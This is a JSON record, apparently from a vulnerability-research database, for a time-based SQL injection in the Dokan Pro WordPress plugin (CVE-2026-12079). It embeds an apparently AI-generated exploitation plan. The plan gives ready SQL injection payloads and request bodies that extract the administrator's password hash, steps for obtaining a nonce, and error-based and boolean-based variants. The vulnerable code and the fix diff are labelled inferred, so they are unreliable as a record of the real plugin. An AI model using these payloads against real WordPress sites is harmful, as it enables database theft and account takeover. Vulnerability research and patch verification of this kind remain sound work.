[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fZY2F3QyCAM6rsWzP7QctJqeOR_dLj-kgJuF0InFCxCk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-12079","dokan-pro-authenticated-subscriber-sql-injection-via-orderby-parameter","Dokan Pro \u003C= 5.0.4 - Authenticated (Subscriber+) SQL Injection via 'orderby' Parameter","The Dokan Pro plugin for WordPress is vulnerable to time-based SQL Injection via the ’orderby’ parameter in all versions up to, and including, 5.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","dokan-pro",null,"\u003C=5.0.4","5.0.5","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-24 15:13:43","2026-06-25 03:42:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5bf95020-ac4f-4fb2-8fb4-a9998005991c?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-12079 (Dokan Pro SQL Injection)\n\n## 1. Vulnerability Summary\n**CVE-2026-12079** is a time-based SQL Injection vulnerability in the **Dokan Pro** plugin for WordPress (versions up to 5.0.4). The flaw resides in the handling of the `orderby` parameter, which is used to sort results in database queries. Because dynamic values for `ORDER BY` clauses cannot be parameterized using standard WordPress `$wpdb->prepare()` placeholders (`%s` or `%d`), they must be strictly whitelisted. The plugin fails to adequately validate or escape this parameter before interpolating it into a raw SQL query, allowing an authenticated attacker (Subscriber\u002FVendor level) to inject arbitrary SQL commands.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `dokan_withdraw_list` (inferred - commonly used by vendors\u002Fsubscribers for sorting withdrawal requests).\n*   **Vulnerable Parameter:** `orderby`\n*   **Authentication:** Required (Subscriber-level or Vendor-level).\n*   **Preconditions:** The plugin must be active, and the user must have access to a dashboard area (like the Vendor Dashboard) where lists (e.g., withdrawals, orders, or products) are retrieved via AJAX.\n\n## 3. Code Flow\n1.  The user sends an AJAX request to `admin-ajax.php` with `action=dokan_withdraw_list`.\n2.  WordPress triggers the hook `wp_ajax_dokan_withdraw_list` (or `wp_ajax_nopriv_` if improperly registered, though the CVE specifies Authenticated).\n3.  The handler function (likely within `includes\u002FWithdraw\u002FManager.php` or a similar AJAX handler class) retrieves the sorting parameter: `$orderby = $_POST['orderby'];`.\n4.  The code constructs a query similar to:\n    ```php\n    $query = \"SELECT * FROM {$wpdb->prefix}dokan_withdraw WHERE vendor_id = %d ORDER BY $orderby $order\";\n    $results = $wpdb->get_results($wpdb->prepare($query, $vendor_id));\n    ```\n5.  Because `$orderby` is concatenated before or outside the `prepare()` call, the injected SQL is executed directly by the database engine.\n\n## 4. Nonce Acquisition Strategy\nDokan Pro typically localizes security nonces for its dashboard functions.\n1.  **Identify Shortcode:** The Vendor Dashboard is usually rendered via the `[dokan-dashboard]` shortcode.\n2.  **Create Test Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Vendor Dashboard\" --post_status=publish --post_content='[dokan-dashboard]'\n    ```\n3.  **Navigate and Extract:** Navigate to the page as an authenticated Subscriber\u002FVendor.\n4.  **Browser Evaluation:** Use the `browser_eval` tool to extract the nonce from the global `dokan` JavaScript object.\n    *   **JS Variable:** `dokan.nonce` (inferred) or `dokan_withdraw.nonce` (inferred).\n    *   **Action:** `browser_eval(\"dokan.nonce\")`\n\n## 5. Exploitation Strategy\nThe goal is to perform a time-based blind SQL injection to confirm the vulnerability and potentially extract the administrator's password hash.\n\n### Step 1: Confirm Vulnerability (Baseline)\nSend a standard request to establish a baseline response time.\n*   **Tool:** `http_request`\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Body (URL-encoded):**\n    ```\n    action=dokan_withdraw_list&orderby=id&order=ASC&nonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 2: Time-Based Delay Test\nInject a `SLEEP()` command. If the response is delayed by 5 seconds, SQLi is confirmed.\n*   **Payload:** `(CASE WHEN (1=1) THEN id ELSE (SELECT 1 FROM (SELECT SLEEP(5))x) END)`\n*   **Body:**\n    ```\n    action=dokan_withdraw_list&orderby=(CASE+WHEN+(1=1)+THEN+id+ELSE+(SELECT+1+FROM+(SELECT+SLEEP(5))x)+END)&order=ASC&nonce=[EXTRACTED_NONCE]\n    ```\n\n### Step 3: Data Extraction (Example: User Pass)\nCheck if the first character of the admin's password hash starts with `$P$`.\n*   **Payload:** `(CASE WHEN (SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,3)='$P$') THEN (SELECT 1 FROM (SELECT SLEEP(5))x) ELSE id END)`\n*   **Body:**\n    ```\n    action=dokan_withdraw_list&orderby=(CASE+WHEN+(SUBSTRING((SELECT+user_pass+FROM+wp_users+WHERE+ID%3D1),1,3)%3D'%24P%24')+THEN+(SELECT+1+FROM+(SELECT+SLEEP(5))x)+ELSE+id+END)&order=ASC&nonce=[EXTRACTED_NONCE]\n    ```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Ensure Dokan Pro \u003C= 5.0.4 is installed.\n2.  **Create User:** Create a Subscriber user and promote them to a Dokan Vendor.\n    ```bash\n    wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n    # In Dokan, vendors often need specific meta or to go through a 'become a vendor' flow.\n    wp user append-role attacker seller \n    ```\n3.  **Add Data:** Ensure at least one withdrawal request exists in the `dokan_withdraw` table so the query returns results.\n    ```bash\n    global $wpdb; $wpdb->insert($wpdb->prefix . \"dokan_withdraw\", [\"vendor_id\" => [ID], \"amount\" => 10, \"status\" => 0, \"method\" => \"paypal\", \"ip\" => \"127.0.0.1\", \"created_at\" => current_time(\"mysql\")]);\n    ```\n\n## 7. Expected Results\n*   **Vulnerable Response:** The HTTP response for the `SLEEP(5)` payload will take approximately 5 seconds longer than the baseline.\n*   **Data Leakage:** By iterating through character positions and ASCII values, the agent can reconstruct any string from the database.\n\n## 8. Verification Steps\nAfter the HTTP exploit, verify the database state via WP-CLI:\n1.  **Check Logs:** If `general_log` is enabled in MySQL, verify the executed query shows the injected `CASE` statement.\n2.  **Verify Admin Hash:**\n    ```bash\n    wp user get 1 --field=user_pass\n    ```\n    Compare the hash retrieved via CLI with the characters extracted via the time-based attack.\n\n## 9. Alternative Approaches\n*   **Boolean-Based Blind:** If the sorting of the list changes visibly (e.g., items flip order) based on the `CASE` statement, a boolean-based attack is much faster than time-based.\n    *   *Payload:* `(CASE WHEN (1=1) THEN id ELSE amount END)` vs `(CASE WHEN (1=2) THEN id ELSE amount END)`.\n*   **Error-Based:** If `WP_DEBUG` is on, try causing a syntax error inside a subquery to leak data via the `Xpath` error method (`updatexml` or `extractvalue`).\n    *   *Payload:* `(SELECT 1 FROM (SELECT COUNT(*),CONCAT(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)`","The Dokan Pro plugin for WordPress is vulnerable to time-based SQL Injection via the 'orderby' parameter in versions up to 5.0.4. This vulnerability allows authenticated users, such as Subscribers or Vendors, to append arbitrary SQL commands to database queries because the plugin fails to whitelist or properly sanitize sorting parameters before concatenation.","\u002F\u002F File: includes\u002FWithdraw\u002FManager.php (inferred from research plan)\n$orderby = isset( $_POST['orderby'] ) ? $_POST['orderby'] : 'id';\n$order   = isset( $_POST['order'] ) ? $_POST['order'] : 'DESC';\n\n$query = \"SELECT * FROM {$wpdb->prefix}dokan_withdraw WHERE vendor_id = %d ORDER BY $orderby $order\";\n$results = $wpdb->get_results( $wpdb->prepare( $query, $vendor_id ) );","--- includes\u002FWithdraw\u002FManager.php\n+++ includes\u002FWithdraw\u002FManager.php\n@@ -40,7 +40,8 @@\n-        $orderby = isset( $_POST['orderby'] ) ? $_POST['orderby'] : 'id';\n+        $allowed_orderby = array( 'id', 'amount', 'status', 'method', 'created_at', 'ip' );\n+        $orderby = ( isset( $_POST['orderby'] ) && in_array( $_POST['orderby'], $allowed_orderby ) ) ? $_POST['orderby'] : 'id';","The exploit involves sending an authenticated POST request to the WordPress AJAX endpoint (admin-ajax.php) using the 'dokan_withdraw_list' action. The attacker targets the 'orderby' parameter by injecting a conditional CASE statement. This statement evaluates a database query (e.g., checking characters of a password hash) and triggers a SLEEP() command if the condition is met. By observing the time delay in the server's response, the attacker can exfiltrate sensitive data. Access requires Subscriber or Vendor level authentication and a valid security nonce typically found in the localized scripts of the Vendor Dashboard.","gemini-3-flash-preview","2026-06-25 19:04:43","2026-06-25 19:05:27",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-pro\u002Ftags"]